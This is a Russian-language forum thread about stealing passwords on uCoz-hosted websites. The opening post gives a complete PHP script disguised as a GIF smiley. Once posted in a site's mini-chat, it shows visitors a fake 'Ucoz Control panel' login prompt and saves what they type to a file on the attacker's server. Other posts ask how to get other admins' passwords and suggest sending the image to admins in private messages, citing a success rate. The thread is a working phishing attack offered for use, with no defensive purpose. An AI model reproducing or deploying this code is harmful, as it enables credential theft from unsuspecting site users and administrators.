to NooB MC Есть такой способ: Нужно зарегистрировать хост с поддержкой php (например, http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например: passwords.txt (сюда будут присылаться пассы пользователей сайта), и на файл smile.gif. Далее качаем любой смайлик в расширении .gif (типа cool.gif). Потом в блокноте пишем: Code: <? header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Ucoz Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?> После этого сохраняем файл под названием smile, потом меняем расширение на gif. Теперь выбираем юкозовский сайт, например http://mysite.ucoz.ru/ потом в мини чате пишем логин, а в содержании сообщения: [I*MG]http://mysite.phphost.net/smile.gif[/I*MG] Если после этого в мини чате вместо сообщения появился смайлик - значит сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, будет появляться форма, в которую нужно будет ввести логин и пароль. Ps: Но этот баг, наверное, уже прикрыли...
а если я вошол в аккаунт админа , но не главного а второстепенного, я могу редактировать шаблоны но немогу зайти в админку.Какие скрипты применить чтобы найти пароли других админов и админки?
ну или фейк авторизации, успех в том случае если включен img, старый способ но по сей день актуальный, хотя в админке укоза img по дефолту вроде отключен
Сижу,читаю,жру.Вот вы сменили пасы ну и х... с того если есть "секретный код или чёт типа этого (непомнб как точно называется)",макситмум что вы сделаете,то только попортите сайт,по если ещё админ не лох(делает бэкап 1 раз в неделю и хранит у себя на компе)..........
ээ.. чета вот попробовал я на двух своих сайтах и баян... файл с расширением gif не интерпретируются пхп интерпретатором. Просто пишет мол картинка повреждена... если попытаться запустить ее прямо с хоста с пхп, а на юкозе просто не отображаецо. Делал все по инструкции, хотя там и делать нечего Подскажите, может дыманул я... Ах да при этом нормальные картинки с левых хостов отображаются....Как я понял вся проблема в
Да ты прав, этот баг уже прикрыли, но есть то что они еще незаметили ))) можно написать тоже самое в личном сообщении админу и если он будет дураком то введет свой логин и пароль, 4 человка из 20 вводят в основном на малопосещяемых сайтах так что дерзайте )))